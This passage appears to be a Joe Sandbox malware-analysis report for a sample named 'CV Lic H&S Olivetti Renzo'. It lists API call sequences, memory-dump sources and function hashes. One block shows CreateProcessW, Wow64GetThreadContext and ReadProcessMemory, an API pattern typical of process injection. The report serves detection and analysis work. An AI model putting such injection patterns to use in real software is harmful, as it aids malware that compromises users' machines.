                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: _wcscat$FileModuleNameOpen
                                                                                            • String ID: \$\Include\
                                                                                            • API String ID: 3592542968-2640467822
                                                                                            • Opcode ID: b8644dc3ebe37aec2b223dc5910cd5e2e57a8ccc442a47e2a4f83873feb1c80f
                                                                                            • Instruction ID: 63e09adae8ec10637a85244b6adecd0f7377c1049ae7b5192dd4863b6dfdc223
                                                                                            • Opcode Fuzzy Hash: b8644dc3ebe37aec2b223dc5910cd5e2e57a8ccc442a47e2a4f83873feb1c80f
                                                                                            • Instruction Fuzzy Hash: B7519FB14043809FC315EF95E989D9EB7F4FF49300B64452EF64893662EB749B88CB52
                                                                                            APIs
                                                                                            • __getstream.LIBCMT ref: 000E34FE
                                                                                              • Part of subcall function 000E7C0E: __getptd_noexit.LIBCMT ref: 000E7C0E
                                                                                            • @_EH4_CallFilterFunc@8.LIBCMT ref: 000E3539
                                                                                            • __wopenfile.LIBCMT ref: 000E3549
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                                                                                            • String ID: <G
                                                                                            • API String ID: 1820251861-2138716496
                                                                                            • Opcode ID: 1be35d107740c85d29ba44cf6681e8a453e5e4c092c24dc27bc072c08510111f
                                                                                            • Instruction ID: b87e49b0b5c099c0f6a832eb2d9ea8ed058e9a9769944aabeaf9d7b1d4f7cff4
                                                                                            • Opcode Fuzzy Hash: 1be35d107740c85d29ba44cf6681e8a453e5e4c092c24dc27bc072c08510111f
                                                                                            • Instruction Fuzzy Hash: D411E7B1A01286DEDB61BF739C426AE7AE4AF45350F148425E419FB2C2EB30CA0197A1
                                                                                            APIs
                                                                                            • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,000DD28B,SwapMouseButtons,00000004,?), ref: 000DD2BC
                                                                                            • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,000DD28B,SwapMouseButtons,00000004,?,?,?,?,000DC865), ref: 000DD2DD
                                                                                            • RegCloseKey.KERNELBASE(00000000,?,?,000DD28B,SwapMouseButtons,00000004,?,?,?,?,000DC865), ref: 000DD2FF
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseOpenQueryValue
                                                                                            • String ID: Control Panel\Mouse
                                                                                            • API String ID: 3677997916-824357125
                                                                                            • Opcode ID: 8d6dd4be3e19586d8cc25b12252c2889a93fbc4801029b6d82562f8dec09c884
                                                                                            • Instruction ID: e89e6ec9fb2b6c985e03af0563184b1ba1151d9f0fad68205abaf659062602fb
                                                                                            • Opcode Fuzzy Hash: 8d6dd4be3e19586d8cc25b12252c2889a93fbc4801029b6d82562f8dec09c884
                                                                                            • Instruction Fuzzy Hash: A9112375611308BFDB208FA8DC84EAE7BB8EF45744B10486AB805D7220E631AE419B60
                                                                                            APIs
                                                                                            • CreateProcessW.KERNELBASE(?,00000000), ref: 01B2613B
                                                                                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01B261D1
                                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01B261F3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081815106.0000000001B24000.00000040.00000020.00020000.00000000.sdmp, Offset: 01B24000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_1b24000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                            • String ID:
                                                                                            • API String ID: 2438371351-0
                                                                                            • Opcode ID: fc310a6135c3389c0587bc6629e9838c2c50d5be0bfc8bfa2df8a04cac11b1e3
                                                                                            • Instruction ID: 12d8f774a28c1808c9e61eb9402754eb615b48133f7b5fabcb97acd6b2d360e6
                                                                                            • Opcode Fuzzy Hash: fc310a6135c3389c0587bc6629e9838c2c50d5be0bfc8bfa2df8a04cac11b1e3
                                                                                            • Instruction Fuzzy Hash: 3F621C30A14258DBEB24CFA4C850BDEB772EF58300F1091A9D60DEB394E7769E85CB59
                                                                                            APIs
                                                                                              • Part of subcall function 000C4517: _fseek.LIBCMT ref: 000C452F
                                                                                              • Part of subcall function 0010C56D: _wcscmp.LIBCMT ref: 0010C65D
                                                                                              • Part of subcall function 0010C56D: _wcscmp.LIBCMT ref: 0010C670
                                                                                            • _free.LIBCMT ref: 0010C4DD
                                                                                            • _free.LIBCMT ref: 0010C4E4
                                                                                            • _free.LIBCMT ref: 0010C54F
                                                                                              • Part of subcall function 000E1C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,000E7A85), ref: 000E1CB1
                                                                                              • Part of subcall function 000E1C9D: GetLastError.KERNEL32(00000000,?,000E7A85), ref: 000E1CC3
                                                                                            • _free.LIBCMT ref: 0010C557
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                            • String ID:
                                                                                            • API String ID: 1552873950-0
                                                                                            • Opcode ID: acbc9bddfc27afc87d88584c9959c104a0ea567534d53ec5d359cc2505f852cb
                                                                                            • Instruction ID: 37c6611debcd42cea096fe4e79da9c09068fc2e56255ac6c8646986dae816400
                                                                                            • Opcode Fuzzy Hash: acbc9bddfc27afc87d88584c9959c104a0ea567534d53ec5d359cc2505f852cb
                                                                                            • Instruction Fuzzy Hash: 32514EB5A04219AFDB159F64DC81BEDBBB9FF48304F10009EB259E3292DB715A808F59
                                                                                            APIs
                                                                                            • _memset.LIBCMT ref: 000DEBB2
                                                                                              • Part of subcall function 000C51AF: _memset.LIBCMT ref: 000C522F
                                                                                              • Part of subcall function 000C51AF: _wcscpy.LIBCMT ref: 000C5283
                                                                                              • Part of subcall function 000C51AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 000C5293
                                                                                            • KillTimer.USER32(?,00000001,?,?), ref: 000DEC07
                                                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 000DEC16
                                                                                            • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00133C88
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                            • String ID:
                                                                                            • API String ID: 1378193009-0
                                                                                            • Opcode ID: 7a32032a3fada7082f1ec575f73cbb6e0cfc9db5af483122e445707957e6df37
                                                                                            • Instruction ID: db78fe83371510793911c927a2f892850ea75ab5b05e3ad44cfc93bdcbaaf1a2
                                                                                            • Opcode Fuzzy Hash: 7a32032a3fada7082f1ec575f73cbb6e0cfc9db5af483122e445707957e6df37
                                                                                            • Instruction Fuzzy Hash: B921FC75504784AFE7339724DC55BE7BBEC9B01308F04148EE69E6A242C3742AC5CB55
                                                                                            APIs
                                                                                            • _memset.LIBCMT ref: 00133725
                                                                                            • GetOpenFileNameW.COMDLG32 ref: 0013376F
                                                                                              • Part of subcall function 000C660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,000C53B1,?,?,000C61FF,?,00000000,00000001,00000000), ref: 000C662F
                                                                                              • Part of subcall function 000C40A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 000C40C6
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Name$Path$FileFullLongOpen_memset
                                                                                            • String ID: X
                                                                                            • API String ID: 3777226403-3081909835
                                                                                            • Opcode ID: 79f0d4c27cf0762142e82701147ee3e965bb262d62114de6f2014adefe90cc12
                                                                                            • Instruction ID: b817086bee4d169d1a67a3bca86ed78cd6f548ad0931c7051484072e4aaf71b7
                                                                                            • Opcode Fuzzy Hash: 79f0d4c27cf0762142e82701147ee3e965bb262d62114de6f2014adefe90cc12
                                                                                            • Instruction Fuzzy Hash: E221C371A10298AFCB11DFD4CC45BEEBBF8AF49304F008019E415BB242DBB49A898F65
                                                                                            APIs
                                                                                            • GetTempPathW.KERNEL32(00000104,?), ref: 0010C72F
                                                                                            • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0010C746
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Temp$FileNamePath
                                                                                            • String ID: aut
                                                                                            • API String ID: 3285503233-3010740371
                                                                                            • Opcode ID: de005a2401656bc193ff685414390fcff80ffef4ff5b75d5b6c381c0688d4e84
                                                                                            • Instruction ID: 436abbfd11241af439a2726c7f2d9a1e6ac566d21cd0e565da302e490ba05959
                                                                                            • Opcode Fuzzy Hash: de005a2401656bc193ff685414390fcff80ffef4ff5b75d5b6c381c0688d4e84
                                                                                            • Instruction Fuzzy Hash: 0CD05E7550030EABDF50ABA0EC0EF8A777C9700708F0001A0B754A50B1DBF0E6D98B55
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: baf05aa961ca25ebb1de8cc6be5907119f6ceafdd9720302edb67a95477ffd76
                                                                                            • Instruction ID: dbee1071447e5d18b4ec4a016ce55825f236f0c25d0182f0886a84f2342a4660
                                                                                            • Opcode Fuzzy Hash: baf05aa961ca25ebb1de8cc6be5907119f6ceafdd9720302edb67a95477ffd76
                                                                                            • Instruction Fuzzy Hash: F0F15C716083419FCB14DF24C485BAEB7E5BF88314F14892EF9999B392D770E946CB82
                                                                                            APIs
                                                                                            • _memset.LIBCMT ref: 000C5022
                                                                                            • Shell_NotifyIconW.SHELL32(00000000,?), ref: 000C50CB
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: IconNotifyShell__memset
                                                                                            • String ID:
                                                                                            • API String ID: 928536360-0
                                                                                            • Opcode ID: 13bcce80b2810aabe59db8f5acb4836a08b6658c16eea402204fe2c132be70c7
                                                                                            • Instruction ID: bb67edddb4dc1cbe07cf3d72f96e480d0343ab3c1b79d764a22b0c4a961b2479
                                                                                            • Opcode Fuzzy Hash: 13bcce80b2810aabe59db8f5acb4836a08b6658c16eea402204fe2c132be70c7
                                                                                            • Instruction Fuzzy Hash: 3331ACB5504B00DFC720DF24D884B9BBBE8FF48309F10092EF59AC2651E771AA84CB96
                                                                                            APIs
                                                                                            • __FF_MSGBANNER.LIBCMT ref: 000E3973
                                                                                              • Part of subcall function 000E81C2: __NMSG_WRITE.LIBCMT ref: 000E81E9
                                                                                              • Part of subcall function 000E81C2: __NMSG_WRITE.LIBCMT ref: 000E81F3
                                                                                            • __NMSG_WRITE.LIBCMT ref: 000E397A
                                                                                              • Part of subcall function 000E821F: GetModuleFileNameW.KERNEL32(00000000,00180312,00000104,00000000,00000001,00000000), ref: 000E82B1
                                                                                              • Part of subcall function 000E821F: ___crtMessageBoxW.LIBCMT ref: 000E835F
                                                                                              • Part of subcall function 000E1145: ___crtCorExitProcess.LIBCMT ref: 000E114B
                                                                                              • Part of subcall function 000E1145: ExitProcess.KERNEL32 ref: 000E1154
                                                                                              • Part of subcall function 000E7C0E: __getptd_noexit.LIBCMT ref: 000E7C0E
                                                                                            • RtlAllocateHeap.NTDLL(01910000,00000000,00000001,00000001,00000000,?,?,000DF507,?,0000000E), ref: 000E399F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                            • String ID:
                                                                                            • API String ID: 1372826849-0
                                                                                            • Opcode ID: c047e61742d609d58781618eb028bd45a9fc82a5be26f920c176becfee451db9
                                                                                            • Instruction ID: 2b773fc55aaab2fddccb8fc3eacba6fd9c3e7f0f23ae22bc74ca36455a0a60b2
                                                                                            • Opcode Fuzzy Hash: c047e61742d609d58781618eb028bd45a9fc82a5be26f920c176becfee451db9
                                                                                            • Instruction Fuzzy Hash: B801B9363452819EE6623B27DC4ABAE77D89B81764F211029F509BB693DFB09D404660
                                                                                            APIs
                                                                                            • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,0010C385,?,?,?,?,?,00000004), ref: 0010C6F2
                                                                                            • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,0010C385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 0010C708
                                                                                            • CloseHandle.KERNEL32(00000000,?,0010C385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0010C70F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$CloseCreateHandleTime
                                                                                            • String ID:
                                                                                            • API String ID: 3397143404-0
                                                                                            • Opcode ID: 390f4851d8416438a35ea92cde3cc301b1221238438242006e58992a0643ed91
                                                                                            • Instruction ID: 9d1734ebaf17ccfd70622ef86f0ce6a0361a505ced6842729dd06080319f0895
                                                                                            • Opcode Fuzzy Hash: 390f4851d8416438a35ea92cde3cc301b1221238438242006e58992a0643ed91
                                                                                            • Instruction Fuzzy Hash: 2CE08636141214B7DB211F54BC09FCA7B19AB46F70F104210FF54690F097B125518B98
                                                                                            APIs
                                                                                            • _free.LIBCMT ref: 0010BB72
                                                                                              • Part of subcall function 000E1C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,000E7A85), ref: 000E1CB1
                                                                                              • Part of subcall function 000E1C9D: GetLastError.KERNEL32(00000000,?,000E7A85), ref: 000E1CC3
                                                                                            • _free.LIBCMT ref: 0010BB83
                                                                                            • _free.LIBCMT ref: 0010BB95
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                            • String ID:
                                                                                            • API String ID: 776569668-0
                                                                                            • Opcode ID: 8d6c99314b0704041c66cbc9d98ad607d1a0ae96d99a55b8255782f8bd4ba31d
                                                                                            • Instruction ID: 5249388b2a993271e1c66689dfdecc3fb516cccc93a1b112787c348368e67c40
                                                                                            • Opcode Fuzzy Hash: 8d6c99314b0704041c66cbc9d98ad607d1a0ae96d99a55b8255782f8bd4ba31d
                                                                                            • Instruction Fuzzy Hash: 26E012B16457814BDA24657A6E88EF323CC5F44355724081DB499F7187CF74E84085A4
                                                                                            APIs
                                                                                              • Part of subcall function 000C22A4: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,000C24F1), ref: 000C2303
                                                                                            • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 000C25A1
                                                                                            • CoInitialize.OLE32(00000000), ref: 000C2618
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0013503A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Handle$CloseInitializeMessageRegisterWindow
                                                                                            • String ID:
                                                                                            • API String ID: 3815369404-0
                                                                                            • Opcode ID: 66e147e223db01c76f732c95c8f84c041c7b69b73bd11cef0ff598a61d09d761
                                                                                            • Instruction ID: 7966e7d7621d7b3e940961a6f599f2f78eaa7fa6d17c708eaa8071ad723b8709
                                                                                            • Opcode Fuzzy Hash: 66e147e223db01c76f732c95c8f84c041c7b69b73bd11cef0ff598a61d09d761
                                                                                            • Instruction Fuzzy Hash: 6F71C2B6901341ABC304EF6AA994999BBAEB7593507A0462EE409D7F72DB304683CF14
                                                                                            APIs
                                                                                            • _strcat.LIBCMT ref: 001208FD
                                                                                              • Part of subcall function 000C936C: __swprintf.LIBCMT ref: 000C93AB
                                                                                              • Part of subcall function 000C936C: __itow.LIBCMT ref: 000C93DF
                                                                                            • _wcscpy.LIBCMT ref: 0012098C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: __itow__swprintf_strcat_wcscpy
                                                                                            • String ID:
                                                                                            • API String ID: 1012013722-0
                                                                                            • Opcode ID: 81e7c13e7ebc246fbf5198ece9c8e944a28aed3095d51890ba42b474edc3eada
                                                                                            • Instruction ID: 6faf96d44017443dc9cce11650f02187abffb4e2ea32dd29b587adc588c0e0b3
                                                                                            • Opcode Fuzzy Hash: 81e7c13e7ebc246fbf5198ece9c8e944a28aed3095d51890ba42b474edc3eada
                                                                                            • Instruction Fuzzy Hash: 62913634A00614DFCB19DF28D491AA9B7E5EF59310B91816EF81A8F3A3DB30ED51CB80
                                                                                            APIs
                                                                                            • IsThemeActive.UXTHEME ref: 000C3A73
                                                                                              • Part of subcall function 000E1405: __lock.LIBCMT ref: 000E140B
                                                                                              • Part of subcall function 000C3ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 000C3AF3
                                                                                              • Part of subcall function 000C3ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 000C3B08
                                                                                              • Part of subcall function 000C3D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,000C3AA3,?), ref: 000C3D45
                                                                                              • Part of subcall function 000C3D19: IsDebuggerPresent.KERNEL32(?,?,?,?,000C3AA3,?), ref: 000C3D57
                                                                                              • Part of subcall function 000C3D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,00181148,00181130,?,?,?,?,000C3AA3,?), ref: 000C3DC8
                                                                                              • Part of subcall function 000C3D19: SetCurrentDirectoryW.KERNEL32(?,?,?,000C3AA3,?), ref: 000C3E48
                                                                                            • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 000C3AB3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
                                                                                            • String ID:
                                                                                            • API String ID: 924797094-0
